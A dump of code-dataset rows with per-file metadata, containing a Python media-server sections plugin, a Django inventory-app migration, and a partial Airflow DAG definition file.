''' | 17.6 | 27 | 0.715909 | 18 | 88 | 3.5 | 0.444444 | 0.380952 | 0.571429 | 0.666667 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 88 | 5 | 28 | 17.6 | 0.875 | 0.909091 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ae7b65a49888f3e95da6e8d28e84448eecdc9943 | 15,786 | py | Python | tridentstream/services/sections/handler.py | tridentstream/mediaserver | 5d47d766df2e8dca076e41348062567a569019fd | [
"MIT"
] | 6 | 2020-01-03T14:50:09.000Z | 2021-09-13T01:44:31.000Z | tridentstream/services/sections/handler.py | tidalstream/mediaserver | 5d47d766df2e8dca076e41348062567a569019fd | [
"MIT"
] | null | null | null | tridentstream/services/sections/handler.py | tidalstream/mediaserver | 5d47d766df2e8dca076e41348062567a569019fd | [
"MIT"
] | null | null | null | import logging
from django.conf.urls import url
from unplugged import DefaultPermission, RelatedPluginField, Schema, command, fields
from ...bases.listing.handler import BaseListingService
from ...bases.listing.models import ListingItem
from ...bases.listing.schema import BaseSchema, ListingSchema
from ...plugins import InputPlugin, InputPluginManager
from .views import SectionsListView
logger = logging.getLogger(__name__)
class SectionInputSchema(Schema):
path = fields.String(default="")
preference = fields.Integer(default=10)
input = RelatedPluginField(plugin_type=InputPlugin, required=True)
class SectionSchema(ListingSchema):
inputs = fields.Nested(SectionInputSchema, many=True, default=list)
class SectionServiceSchema(BaseSchema):
sections = fields.Nested(SectionSchema, many=True, default=list)
class SectionsService(BaseListingService):
plugin_name = "sections"
config_schema = SectionServiceSchema
default_permission = DefaultPermission.ALLOW
simpleadmin_templates = [
{
"template": {
"display_name": {"simpleAdminMethod": "userInput", "required": True},
"inputs": {
"simpleAdminMethod": "userInput",
"hideFields": ["preference"],
},
"name": {"simpleAdminMethod": "slugify", "source": "display_name"},
"histories": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "history",
"name": "history",
}
],
"primary_metadata_plugin": {
"simpleAdminMethod": "injectablePlugin",
"plugin_type": "metadatahandler",
"required": False,
"traits": ["primary_metadata", "metadata_movie"],
},
"rebuild_automatically": True,
"levels": [
{
"indexer": {
"simpleAdminMethod": "createPlugin",
"plugin_type": "indexer",
"plugin_name": "whoosh",
"name": "index_automanaged_%(name)s",
"config": {"path": "index_automanaged_%(name)s"},
},
"depth": 0,
"content_type": "movies",
"default_ordering": "-metadata_firstseen__datetime,-datetime",
"listing_depth": 0,
"tags": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "tag",
"name": "tag",
}
],
"metadata_handlers": [
{
"simpleAdminMethod": "injectedPlugin",
"id": "primary_metadata_plugin",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "historymetadata",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "iteminfo",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "firstseen",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "name",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "tag",
},
],
}
],
},
"description": "A folder with movies in it",
"id": "movies",
"update_method": "modify_key",
"modify_key": "sections",
"display_name": "Movies",
},
{
"template": {
"display_name": {"simpleAdminMethod": "userInput", "required": True},
"inputs": {
"simpleAdminMethod": "userInput",
"hideFields": ["preference"],
},
"name": {"simpleAdminMethod": "slugify", "source": "display_name"},
"histories": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "history",
"name": "history",
}
],
"primary_metadata_plugin": {
"simpleAdminMethod": "injectablePlugin",
"plugin_type": "metadatahandler",
"traits": ["primary_metadata", "metadata_tv"],
},
"rebuild_automatically": True,
"levels": [
{
"indexer": {
"simpleAdminMethod": "createPlugin",
"plugin_type": "indexer",
"plugin_name": "whoosh",
"name": "index_automanaged_%(name)s",
"config": {"path": "index_automanaged_%(name)s"},
},
"depth": 0,
"content_type": "tvshows",
"default_ordering": "-datetime",
"listing_depth": 0,
"tags": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "tag",
"name": "tag",
}
],
"metadata_handlers": [
{
"simpleAdminMethod": "injectedPlugin",
"id": "primary_metadata_plugin",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "tag",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "firstseen",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "name",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "tag",
},
],
},
{
"indexer": None,
"depth": 1,
"content_type": "episodes",
"default_ordering": "-metadata_iteminfo__season,-metadata_iteminfo__episode",
"listing_depth": 0,
"metadata_handlers": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "historymetadata",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "iteminfo",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "firstseen",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "name",
},
],
},
],
},
"description": "Folder with TV shows.\n\n"
"The folder must have the organization /tv/show/episode.\n"
"An example could be /TVFolder/A.Good.Show/A.Good.Show.S03E03",
"id": "tv-episode",
"update_method": "modify_key",
"modify_key": "sections",
"display_name": "TV /tv/show/episode",
},
{
"template": {
"display_name": {"simpleAdminMethod": "userInput", "required": True},
"inputs": {
"simpleAdminMethod": "userInput",
"hideFields": ["preference"],
},
"name": {"simpleAdminMethod": "slugify", "source": "display_name"},
"histories": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "history",
"name": "history",
}
],
"primary_metadata_plugin": {
"simpleAdminMethod": "injectablePlugin",
"plugin_type": "metadatahandler",
"traits": ["primary_metadata", "metadata_tv"],
},
"rebuild_automatically": True,
"levels": [
{
"indexer": {
"simpleAdminMethod": "createPlugin",
"plugin_type": "indexer",
"plugin_name": "whoosh",
"name": "index_automanaged_%(name)s",
"config": {"path": "index_automanaged_%(name)s"},
},
"depth": 0,
"content_type": "tvshows",
"default_ordering": "-datetime",
"listing_depth": 0,
"tags": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "tag",
"name": "tag",
}
],
"metadata_handlers": [
{
"simpleAdminMethod": "injectedPlugin",
"id": "primary_metadata_plugin",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "tag",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "firstseen",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "name",
},
],
},
{
"indexer": None,
"depth": 1,
"content_type": "seasons",
"default_ordering": "-metadata_iteminfo__season",
"listing_depth": 0,
"metadata_handlers": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "iteminfo",
}
],
},
{
"indexer": None,
"depth": 2,
"content_type": "episodes",
"default_ordering": "-metadata_iteminfo__season,-metadata_iteminfo__episode",
"listing_depth": 0,
"metadata_handlers": [
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "historymetadata",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "iteminfo",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "firstseen",
},
{
"simpleAdminMethod": "lookupPlugin",
"plugin_type": "metadatahandler",
"name": "name",
},
],
},
],
},
"description": "Folder with TV shows.\n\n"
"The folder must have the organization /tv/show/season/episode.\n"
"An example could be /TVFolder/A.Good.Show/Season.03/A.Good.Show.S03E03",
"id": "tv-season-episode",
"update_method": "modify_key",
"modify_key": "sections",
"display_name": "TV /tv/show/season/episode",
},
]
def get_urls(self):
return [
url(
r"^(?P<path>.*)$",
SectionsListView.as_view(
service=self, listing_builder=self.listing_builder
),
)
]
def get_item(self, config, path):
if not config.get("inputs"):
return None
plugin_path_pairs = []
for input_config in config["inputs"]:
input_path = input_config.get("path", "").strip("/")
listing_path = f"{input_path}/{config['path']}"
plugin_path_pairs.append((input_config["input"], listing_path.strip("/")))
logger.info(f"Trying to create listing for {plugin_path_pairs!r} - path:{path}")
item = InputPluginManager.get_item_multiple(plugin_path_pairs)
if "/" not in path and "display_name" in config:
item.id = config["display_name"]
return item
| 43.013624 | 101 | 0.36393 | 800 | 15,786 | 6.97875 | 0.19125 | 0.060899 | 0.169264 | 0.188608 | 0.739925 | 0.7247 | 0.709833 | 0.708401 | 0.708401 | 0.699624 | 0 | 0.003255 | 0.532877 | 15,786 | 366 | 102 | 43.131148 | 0.753865 | 0 | 0 | 0.562857 | 0 | 0.002857 | 0.293488 | 0.045547 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005714 | false | 0 | 0.022857 | 0.002857 | 0.074286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8856e99a56664e44d4b8532010961c9712b69449 | 19,581 | py | Python | inventario/migrations/0001_initial.py | exildev/pisix | 6e844be31333c7f6cd12fd0e21dc990405f9c27c | [
"MIT"
] | null | null | null | inventario/migrations/0001_initial.py | exildev/pisix | 6e844be31333c7f6cd12fd0e21dc990405f9c27c | [
"MIT"
] | null | null | null | inventario/migrations/0001_initial.py | exildev/pisix | 6e844be31333c7f6cd12fd0e21dc990405f9c27c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-18 22:41
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0007_alter_validators_add_error_messages'),
]
operations = [
migrations.CreateModel(
name='ActaEntrada',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='actas_entrada')),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de entrada',
'verbose_name_plural': 'Actas de entradas',
},
),
migrations.CreateModel(
name='ActaRequisicion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de requisici\xf3n',
'verbose_name_plural': 'Actas de requisici\xf3n',
},
),
migrations.CreateModel(
name='ActaSalida',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('archivo', models.FileField(blank=True, null=True, upload_to='actas_salida', verbose_name='Acta')),
('descripcion', models.TextField(max_length=500)),
],
options={
'verbose_name': 'Acta de salida',
'verbose_name_plural': 'Actas de salidas',
},
),
migrations.CreateModel(
name='Activo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serial', models.CharField(max_length=60)),
('activado', models.BooleanField(default=True)),
('vendido', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Activo Serial',
'verbose_name_plural': 'Activos Seriales',
},
),
migrations.CreateModel(
name='ActivoInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('serial', models.CharField(max_length=60)),
('activado', models.BooleanField(default=True)),
('vendido', models.BooleanField(default=False)),
],
options={
'verbose_name': 'Activo no serial',
'verbose_name_plural': 'Activo no seriales',
},
),
migrations.CreateModel(
name='Articulo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('descripcion', models.TextField(max_length=500)),
('fecha_creacion', models.DateTimeField(auto_now=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='articulos')),
('tiempo_entrega', models.IntegerField(verbose_name='Tiempo de entrega(Dias)')),
('activado', models.BooleanField(default=True)),
('precio', models.DecimalField(decimal_places=2, max_digits=19)),
],
options={
'verbose_name': 'Articulo Piscina',
'verbose_name_plural': 'Articulos Piscinas',
},
),
migrations.CreateModel(
name='ArticuloInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('descripcion', models.TextField(max_length=500)),
('activado', models.BooleanField(default=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='articulos')),
('precio', models.DecimalField(decimal_places=2, max_digits=19)),
('fecha_creacion', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Articulo no serial',
'verbose_name_plural': 'Aticulos no seriales',
},
),
migrations.CreateModel(
name='Bodega',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identi', models.CharField(max_length=45, verbose_name='Identificaci\xf3n')),
('nombre', models.CharField(max_length=45)),
('direccion', models.CharField(max_length=100)),
('telefono', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Central',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Central',
'verbose_name_plural': 'Centrales',
},
),
migrations.CreateModel(
name='Cuenta',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Cuenta',
'verbose_name_plural': 'Cuentas',
},
bases=('auth.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Custodio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identi', models.CharField(max_length=45, verbose_name='Identificaci\xf3n')),
('nombre', models.CharField(max_length=45)),
('direccion', models.CharField(max_length=100)),
('telefono', models.CharField(max_length=10)),
('correo', models.CharField(max_length=45)),
],
),
migrations.CreateModel(
name='EntradaInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('imagen', models.ImageField(blank=True, null=True, upload_to='actas_entrada')),
('descripcion', models.TextField(max_length=500)),
('activos', models.ManyToManyField(to='inventario.ActivoInsumo')),
('custodio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio')),
('destino', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destino1', to='inventario.Bodega')),
('origen', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='origen1', to='inventario.Bodega')),
],
options={
'verbose_name': 'Entrada de Insumo',
'verbose_name_plural': 'Entradas de Insimos',
},
),
migrations.CreateModel(
name='Fabricante',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('logo', models.ImageField(blank=True, null=True, upload_to='logo')),
('fecha', models.DateField(auto_now=True)),
],
),
migrations.CreateModel(
name='LogInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('cantidad', models.IntegerField()),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActivoInsumo')),
('bodega', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Log de Insumo',
'verbose_name_plural': 'Logs de insumos',
},
),
migrations.CreateModel(
name='LogPiscina',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('cantidad', models.IntegerField()),
('articulo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
options={
'verbose_name': 'Log piscina',
'verbose_name_plural': 'Logs de piscinas',
},
),
migrations.CreateModel(
name='Proveedor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=45)),
('logo', models.ImageField(blank=True, null=True, upload_to='logo')),
('fecha', models.DateField(auto_now=True)),
],
options={
'verbose_name': 'Proveedor',
'verbose_name_plural': 'Provedores',
},
),
migrations.CreateModel(
name='RequisicionArticulo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('acta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActaRequisicion')),
('articulo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo')),
],
options={
'verbose_name': 'Activo',
'verbose_name_plural': 'Activos',
},
),
migrations.CreateModel(
name='RequisicionNoSerial',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cantidad', models.IntegerField()),
('acta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActaRequisicion')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ArticuloInsumo')),
],
options={
'verbose_name': 'Activo no serial',
'verbose_name_plural': 'Activos no seriales',
},
),
migrations.CreateModel(
name='SalidaInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now=True)),
('archivo', models.FileField(blank=True, null=True, upload_to='actas_salida', verbose_name='Acta')),
('descripcion', models.TextField(max_length=500)),
('activos', models.ManyToManyField(to='inventario.ActivoInsumo')),
('creado_por', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta')),
('custodio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio')),
('destino', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='destino2', to='inventario.Bodega')),
('salida', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='origen2', to='inventario.Bodega')),
],
options={
'verbose_name': 'Salida de Insumo',
'verbose_name_plural': 'Salidas de Insumos',
},
),
migrations.CreateModel(
name='TipoActivo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
],
options={
'verbose_name': 'Tipo de piscina',
'verbose_name_plural': 'Tipos de piscinas',
},
),
migrations.CreateModel(
name='TrazabilidadActivo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('mensage', models.CharField(max_length=150, verbose_name='Mensaje')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Activo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
),
migrations.CreateModel(
name='TrazabilidadInsumo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateTimeField(auto_now_add=True)),
('mensage', models.CharField(max_length=150, verbose_name='Mensaje')),
('activo', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ActivoInsumo')),
('bodega', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega')),
],
),
migrations.CreateModel(
name='Compra',
fields=[
('actaentrada_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventario.ActaEntrada')),
('creado_por', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta')),
],
bases=('inventario.actaentrada',),
),
migrations.AddField(
model_name='articuloinsumo',
name='fabricante',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Fabricante'),
),
migrations.AddField(
model_name='articulo',
name='fabricante',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Fabricante'),
),
migrations.AddField(
model_name='activoinsumo',
name='articulo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.ArticuloInsumo'),
),
migrations.AddField(
model_name='activoinsumo',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='activo',
name='articulo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Articulo'),
),
migrations.AddField(
model_name='activo',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='activo',
name='tipo',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.TipoActivo'),
),
migrations.AddField(
model_name='actasalida',
name='activos',
field=models.ManyToManyField(blank=True, to='inventario.Activo'),
),
migrations.AddField(
model_name='actasalida',
name='creado_por',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Cuenta'),
),
migrations.AddField(
model_name='actasalida',
name='custodio',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio'),
),
migrations.AddField(
model_name='actasalida',
name='destino',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='destino', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actasalida',
name='salida',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='salida', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actarequisicion',
name='bodega',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Bodega'),
),
migrations.AddField(
model_name='actarequisicion',
name='central',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Central'),
),
migrations.AddField(
model_name='actaentrada',
name='activos',
field=models.ManyToManyField(blank=True, to='inventario.Activo'),
),
migrations.AddField(
model_name='actaentrada',
name='custodio',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventario.Custodio'),
),
migrations.AddField(
model_name='actaentrada',
name='destino',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destino_', to='inventario.Bodega'),
),
migrations.AddField(
model_name='actaentrada',
name='origen',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='origen_', to='inventario.Bodega'),
),
]
| 48.229064 | 204 | 0.572392 | 1,820 | 19,581 | 6.007692 | 0.098901 | 0.062374 | 0.052497 | 0.082495 | 0.835742 | 0.781599 | 0.746205 | 0.738705 | 0.738705 | 0.715749 | 0 | 0.006901 | 0.289515 | 19,581 | 405 | 205 | 48.348148 | 0.77904 | 0.003422 | 0 | 0.710327 | 1 | 0 | 0.175183 | 0.017477 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012594 | 0 | 0.02267 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
888dfc9a16479e5ce1e46a66352fcbf914a2175b | 241,746 | py | Python | etl_base/dags/sqlg_dag_PRD.py | buckylee2019/sqlg-airflow-2.0 | 431b823d181af8c0557a8eed26062883bef49ebd | [
"Apache-2.0"
] | null | null | null | etl_base/dags/sqlg_dag_PRD.py | buckylee2019/sqlg-airflow-2.0 | 431b823d181af8c0557a8eed26062883bef49ebd | [
"Apache-2.0"
] | null | null | null | etl_base/dags/sqlg_dag_PRD.py | buckylee2019/sqlg-airflow-2.0 | 431b823d181af8c0557a8eed26062883bef49ebd | [
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Author : Jesse Wei
# LastUpdate : 2020/10/04
# Impact : Jobs generated by SQLG
# Message : Humanity towards others, we live by sharing. Fear can hold you prisoner, only hope can set you free.
# from __future__ import print_function
import logging
import re
import pendulum
import airflow
from datetime import datetime, timedelta
from airflow.sensors.external_task import ExternalTaskSensor
from airflow.operators.python_operator import PythonOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import BranchPythonOperator
from airflow.contrib.sensors.file_sensor import FileSensor
from airflow.operators.dummy_operator import DummyOperator
from airflow.models import Variable, DagModel, DagBag
from airflow import models
from acme.operators.sqlg_oracle import OracleOperatorWithTemplatedParams
from airflow.operators.oracle_operator import OracleOperator
# DB_NAME = 'DWH' # for future xDB operator
proj_start_date = pendulum.datetime(2021, 1, 1, tz="Etc/GMT-8")
tmpl_search_path = Variable.get("sql_path")
data_stage_imp_ptn = '_ODS_'
data_stage = []
std_interval = {
'@once' :1,
'@hourly' :2,
'0 5 * * *' :3,
'0 5 * * 0' :4,
'0 5 1 * *' :5,
'0 5 1 */3 *' :6,
'0 5 1 1 *' :7,
}
# function to sync execution for diff frequency
def sqlg_exec_date_fn(dt, context):
var_date = Variable.get("sqlg_execution_date")
ti = context['ti']
dag = context['dag']
ti_exec_date = context['execution_date']
schedule_interval = dag.schedule_interval
# if wait INIT and standard freq then set as default {{ ds }} # set in planner
# else use dag own execution date
if ti.task.external_dag_id == 'D_STG_INIT' and schedule_interval[0] == '@':
exec_date = pendulum.parse(var_date)
else:
exec_date = ti_exec_date
print("sqlg_exec_date_fn::DEBUG:external_dag_id, exec_date:", ti.task.external_dag_id, exec_date)
return exec_date
args = {
"owner": "DG_IBM2",
'start_date': proj_start_date,
'provide_context': True
}
# XSLT:loop: declaration: END}
# XSLT:loop: JOB_FLOW_NAME: START{
job_flow_name = "D_ODS_PRD_SRC"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_PRD_SRC")
D_ODS_PRD_SRC = airflow.DAG(
"D_ODS_PRD_SRC",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_SDM_PRD"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_SDM_PRD")
D_SDM_PRD = airflow.DAG(
"D_SDM_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_DM_PRD"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_DM_PRD")
D_DM_PRD = airflow.DAG(
"D_DM_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_CUS")
D_ODS_CUS = airflow.DAG(
"D_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_GBD"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_GBD")
D_ODS_GBD = airflow.DAG(
"D_ODS_GBD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_HRM"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_HRM")
D_ODS_HRM = airflow.DAG(
"D_ODS_HRM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_MFG"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_MFG")
D_ODS_MFG = airflow.DAG(
"D_ODS_MFG",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
